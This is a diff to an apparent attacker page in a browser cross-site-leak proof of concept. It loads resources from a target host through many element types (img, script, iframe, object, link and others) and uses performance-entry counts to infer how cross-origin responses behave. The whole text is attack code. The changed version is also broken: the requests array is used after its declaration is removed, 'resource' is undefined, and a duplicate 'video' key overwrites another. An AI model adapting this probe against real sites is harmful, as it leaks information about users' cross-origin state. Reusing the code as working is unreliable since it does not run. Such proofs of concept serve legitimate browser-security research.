--- a/src/poc2/attacker.html
+++ b/src/poc2/attacker.html
@@ -8,10 +8,10 @@
         document.getElementById('tbody').innerHTML += `<tr><td>${element}</td><td>${url}</td><td>${size}</td><td>${event}</td><td>${diff}</td><tr>`;
       }
 
-      function get(element, url, size) {
+      function get(element, attribute, url, size) {
         let start = performance.getEntries().length;
         let e = document.createElement(element);
-        e['src'] = `${url}?size=${size}&id=${performance.now()}`;
+        e[attribute] = `${url}?size=${size}&id=${performance.now()}`;
 
         e.onload = () => {
           show(element, url, size, 'onload', performance.getEntries().length - start);
@@ -23,52 +23,56 @@
 
         }
         e.onabort = () => {
-          show(element, url, size, 'onabort', performance.getEntries().length - start);
+          show(element + ' ' + attribute, url, size, 'onabort', performance.getEntries().length - start);
         }
         e.onemptied = () => {
-          show(element, url, size, 'onemptied', performance.getEntries().length - start);
+          show(element + ' ' + attribute, url, size, 'onemptied', performance.getEntries().length - start);
         }
         e.onstalled = () => {
-          show(element, url, size, 'onstalled', performance.getEntries().length - start);
+          show(element + ' ' + attribute, url, size, 'onstalled', performance.getEntries().length - start);
         }
         e.onsuspend = () => {
-          show(element, url, size, 'onsuspend', performance.getEntries().length - start);
+          show(element + ' ' + attribute, url, size, 'onsuspend', performance.getEntries().length - start);
         }
       }
 
       var base = 'https://target.georgetian.com/';
-      var resources = [
-        //'text.txt',
-        'audio.mp3',
-        //'frame',
-        //'iframe',
-        'img.png',
-        //'script.js',
-        //'video.mp4',
-      ];
+
       var sizes = [
         2,
         95000,
       ];
 
+      var tags = {
+        'applet': 'code',
+        'audio': 'src',
+        'embed': 'src',
+        'frame': 'src',
+        'iframe': 'src',
+        'img': 'src',
+        'input': 'src',
+        'link': 'href',
+        'object': 'data',
+        'script': 'src',
+        'track': 'src',
+        'video': 'poster',
+        'video': 'src',
+      }
+
+      var delay = 500;
 
       function run() {
         fetch('/reset');
         let elements = [];
-        for (const resource of resources) {
-          elements.push(resource.split('.')[0]);
-        };
-        let requests = [];
+        
 
-        for (const element of elements) {
-          for (const resource of resources) {
-            for (const size of sizes) {
-              requests.push([element, base + resource, size]);
-            }
+        for (let key in tags) {
+          for (const size of sizes) {
+            requests.push([key, tags[key], base + resource, size]);
           }
         }
         for (let i = 0; i < requests.length; i++) {
-          setTimeout(get, (i + 1) * 1000, requests[i][0], requests[i][1], requests[i][2]);
+          setTimeout(get, (i + 1) * delay, requests[i][0], requests[i][1], requests[i][2], requests[i][3]);
         }
       }
 
@@ -79,7 +83,7 @@
           run();
         });
 			} else {
-        //document.body.innerHTML += ('Browser does not support Service Workers');
+        document.body.innerHTML += ('Browser does not support Service Workers');
       }
 
     </script>
